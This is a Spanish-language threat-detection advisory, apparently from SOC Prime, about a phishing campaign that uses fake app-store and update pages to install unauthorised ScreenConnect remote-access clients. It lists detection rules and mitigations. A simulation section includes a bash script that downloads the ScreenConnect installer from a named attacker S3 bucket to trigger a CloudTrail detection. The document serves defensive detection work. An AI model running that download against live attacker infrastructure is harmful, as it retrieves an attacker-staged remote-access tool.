SOC Prime Bias: Alto

11 Aug 2026 06:17 UTC

Propagación de ScreenConnect a Gran Escala a Través de Phishing con Temática de App Store

Author Photo
SOC Prime Team linkedin icon Seguir
Propagación de ScreenConnect a Gran Escala a Través de Phishing con Temática de App Store
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Resumen

Una campaña de phishing a gran escala está utilizando técnicas avanzadas de ingeniería social para desplegar clientes de ConnectWise ScreenConnect no autorizados. Los atacantes se hacen pasar por servicios de confianza como Microsoft Store, Apple App Store y Google Meet a través de contenido web dinámico y mensajes de actualización fraudulentos. Una vez instalado, el software RMM proporciona a los actores de amenazas acceso remoto persistente a los sistemas comprometidos.

Investigación

El equipo de LevelBlue OpsCTI descubrió la campaña mediante el análisis de un marco de phishing de actualizaciones falsas y una infraestructura reutilizada. Los investigadores identificaron estructuras de directorios consistentes, hashes de recursos HTTP recurrentes y scripts asistidos por IA utilizados para perfilar a posibles víctimas. La investigación también reveló el abuso de las APIs de Telegram Bot para telemetría en tiempo real e informes de infecciones.

Mitigación

Las organizaciones deben priorizar la detección de software RMM no autorizado y monitorear las descargas ejecutables de servicios de nube pública desconocidos como Amazon S3 o Cloudflare R2. También se recomiendan controles para identificar la suplantación de marcas y el tráfico no autorizado de la API de Telegram Bot. Las revisiones regulares de inventario de endpoints pueden ayudar a descubrir instalaciones deshonestas de ScreenConnect y compromisos existentes.

Respuesta

Si se sospecha de un compromiso, los sistemas afectados deben ser aislados de inmediato y cualquier cliente de ScreenConnect que comunique con instancias de retransmisión no autorizadas debe ser investigado. Se deben revisar los registros de red en busca de conexiones sospechosas a dominios conocidos de phishing o puntos finales de almacenamiento en la nube pública. Los respondedores también deberían examinar los procesos lanzados por msiexec.exe o PowerShell que descargan archivos de fuentes externas.

Flujo de Ataque

Detecciones

La posibilidad de ejecución a través de líneas de comando de PowerShell ocultas (vía cmdline)

Equipo de SOC Prime
10 Ago 2026

Llamar a métodos .NET sospechosos desde Powershell (vía powershell)

Equipo de SOC Prime
10 Ago 2026

Posible ejecución de archivos Msiexec en un directorio inusual (vía cmdline)

Equipo de SOC Prime
10 Ago 2026

Software alternativo de acceso remoto / gestión (vía process_creation)

Equipo de SOC Prime
10 Ago 2026

Posible abuso de dominio de desarrollo de Cloudflare (vía dns)

Equipo de SOC Prime
10 Ago 2026

Comando y control sospechoso mediante solicitud DNS de un dominio de nivel superior inusual (TLD) (vía dns)

Equipo de SOC Prime
10 Ago 2026

IOCs (HashSha256) para detectar: Más allá de ‘Actualizaciones Falsas’: De Phishing Temático de Tiendas de Aplicaciones a Distribución a Gran Escala de ScreenConnect

Reglas de IA de SOC Prime
10 Ago 2026

IOCs (SourceIP) para detectar: Más allá de ‘Actualizaciones Falsas’: De Phishing Temático de Tiendas de Aplicaciones a Distribución a Gran Escala de ScreenConnect

Reglas de IA de SOC Prime
10 Ago 2026

IOCs (DestinationIP) para detectar: Más allá de ‘Actualizaciones Falsas’: De Phishing Temático de Tiendas de Aplicaciones a Distribución a Gran Escala de ScreenConnect

Reglas de IA de SOC Prime
10 Ago 2026

Ejecución de instalación no autorizada de ScreenConnect vía phishing [Creación de Procesos de Windows]

Reglas de IA de SOC Prime
10 Ago 2026

Detectar descarga del instalador de ScreenConnect desde buckets S3 sospechosos [AWS Cloudtrail]

Reglas de IA de SOC Prime
10 Ago 2026

Ejecución de Simulación

Prerrequisito: La Verificación Previa de Telemetría y Línea Base debe haber pasado.

Racional: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente los TTP identificados y apuntar a generar la telemetría exacta esperada por la lógica de detección. Los ejemplos abstractos o no relacionados conducirán a un diagnóstico erróneo.

  • Narrativa del Ataque y Comandos: Un atacante ha establecido una campaña de phishing. Para evitar la detección por antivirus basados en archivos, alojan una herramienta legítima de acceso remoto (ScreenConnect) en un bucket AWS S3 público que imita la distribución legítima de software. El atacante instruye a una víctima para descargar el instalador. Esta acción activa un GetObject evento en AWS CloudTrail, apuntando al bucket malicioso específico eobtdk.s3.us-east-2.amazonaws.com y al nombre de archivo específico ScreenConnect.ClientSetup.msi.

  • Guión de Prueba de Regresión: [Note: Since we cannot interact with real malicious buckets, this script simulates the solicitud que generaría la entrada del registro si el bucket existiera.]

    #!/bin/bash
    # Script de simulación para activar la regla de detección de CloudTrail
    # Esto imita la llamada a la API que haría un adversario para descargar la herramienta
    
    echo "[+] Iniciando Simulación: Descargando ScreenConnect desde Malicious S3..."
    
    # Usamos el CLI de AWS para intentar una solicitud GET.
    # Incluso si el bucket no existe, el intento de 'solicitud' genera el evento de CloudTrail
    # en un entorno real donde el bucket está configurado.
    
    aws s3 cp s3://eobtdk/ScreenConnect.ClientSetup.msi . --region us-east-2
    
    echo "[+] Comando de simulación enviado. Verifique CloudTrail para eventos GetObject apuntando a 'eobtdk.s3.us-east-2.amazonaws.com'."
  • Comandos de Limpieza:

    # Eliminar cualquier archivo descargado durante la simulación
    rm -f ScreenConnect.ClientSetup.msi